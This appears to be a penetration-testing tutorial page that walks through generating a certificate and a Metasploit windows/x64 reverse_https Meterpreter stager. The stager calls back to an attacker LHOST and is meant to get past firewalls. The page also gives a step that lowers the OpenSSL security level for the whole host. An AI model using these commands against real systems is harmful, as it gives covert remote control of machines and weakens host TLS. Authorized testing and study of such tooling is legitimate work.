# HTTPS Meterpreter

## Overview

> HTTPS Meterpreter is a type of Meterpreter shell that uses the HTTPS protocol for communication between the attacker and the target system. This type of shell is commonly used in situations where the attacker needs to bypass firewall or network restrictions that may prevent other types of shells, such as reverse TCP or bind TCP, from working properly.

## Generating your own self-signed certificate

To generate your own self-signed certificate:

```bash
openssl req -new -x509 -nodes -out cert.crt -keyout priv.key
```

For Metasploit to use the certificate, we concatenate the private key and the certificate (which carries the public key) into a single .pem file:

```bash
cat priv.key cert.crt > rfc.pem
```

{% hint style="info" %}
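We must also change the *CipherString* in the `/etc/ssl/openssl.cnf` config file, or our reverse HTTPS shell will not work properly. This file holds the host's OpenSSL system defaults, so the change also applies to other programs on the host that load it.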

First, we will locate this line in the config file:

```bash
CipherString=DEFAULT@SECLEVEL=2
```

and change it to:

```bash
CipherString=DEFAULT
```

{% endhint %}
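
To check which security level the system default ends up with after this edit, and to confirm it once `@SECLEVEL=2` is restored, the following added example (not part of the original page) parses an OpenSSL config from stdin and follows the section chain to the active `CipherString`. The function names and the sample config are constructed for illustration.

```bash
#!/bin/sh
# Added example. Prints "<CipherString> <level>": level is the digit after
# @SECLEVEL=, or "unset" when absent (the library compiled-in default applies).
# Prints "none none" when no system-default CipherString is configured.
openssl_default_seclevel() {
    awk '
    function trim(s) { sub(/^[ \t]+/, "", s); sub(/[ \t\r]+$/, "", s); return s }
    BEGIN { sect = "default" }            # text before any [section] header
    {
        line = $0
        sub(/#.*/, "", line)              # strip comments
        line = trim(line)
        if (line == "") next
        if (line ~ /^\[.*\]$/) {          # [ section ] header
            sect = trim(substr(line, 2, length(line) - 2))
            next
        }
        eq = index(line, "=")             # split on the first "=" only
        if (eq == 0) next
        conf[sect, trim(substr(line, 1, eq - 1))] = trim(substr(line, eq + 1))
    }
    END {
        # Follow openssl_conf -> ssl_conf -> system_default to the live section;
        # a CipherString in an unreferenced section has no effect.
        s = conf["default", "openssl_conf"]
        s = conf[s, "ssl_conf"]
        s = conf[s, "system_default"]
        cs = conf[s, "CipherString"]
        if (cs == "") { print "none none"; exit }
        level = "unset"
        p = index(cs, "@SECLEVEL=")
        if (p > 0) level = substr(cs, p + 10, 1)
        print cs, level
    }'
}
# Constructed sample config, for demonstration only.
sample_conf() {
    cat <<'EOF'
openssl_conf = default_conf
[ default_conf ]
ssl_conf = ssl_sect
[ ssl_sect ]
system_default = system_default_sect
[ system_default_sect ]
CipherString = DEFAULT@SECLEVEL=2   # the line this page edits
EOF
}
sample_conf | openssl_default_seclevel
```

On a real host, run it as `openssl_default_seclevel < /etc/ssl/openssl.cnf`.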

Finally, we can set it in our Metasploit instance:

```bash
set StagerVerifySSLCert true
set HandlerSSLCert /home/kali/self_cert/rfc.pem
```

## Generating the payload in msfconsole

To generate a Meterpreter payload:

{% code overflow="wrap" %}

```bash
msf6 > use windows/x64/meterpreter/reverse_https
msf6 payload(windows/x64/meterpreter/reverse_https) > set LHOST tun0
LHOST => 192.168.45.5
msf6 payload(windows/x64/meterpreter/reverse_https) > set LPORT 443
LPORT => 443
msf6 payload(windows/x64/meterpreter/reverse_https) > set StagerVerifySSLCert true
StagerVerifySSLCert => true 
msf6 payload(windows/x64/meterpreter/reverse_https) > set HandlerSSLCert ../../payloads/SpaceX.pem
handlersslcert => ../../payloads/SpaceX.pem
msf6 exploit(multi/handler) > set EnableStageEncoding true
EnableStageEncoding => true

## optional proxy
msf6 exploit(multi/handler) > set HttpProxyHost 172.16.20.50
HttpProxyHost => 172.16.20.50
msf6 exploit(multi/handler) > set HttpProxyPort 8080
HttpProxyPort => 8080

msf6 payload(windows/x64/meterpreter/reverse_https) > generate -f raw -o spacex.bin
```

{% endcode %}

## References

{% embed url="<https://ppn.snovvcrash.rocks/pentest/c2/meterpreter>" %}


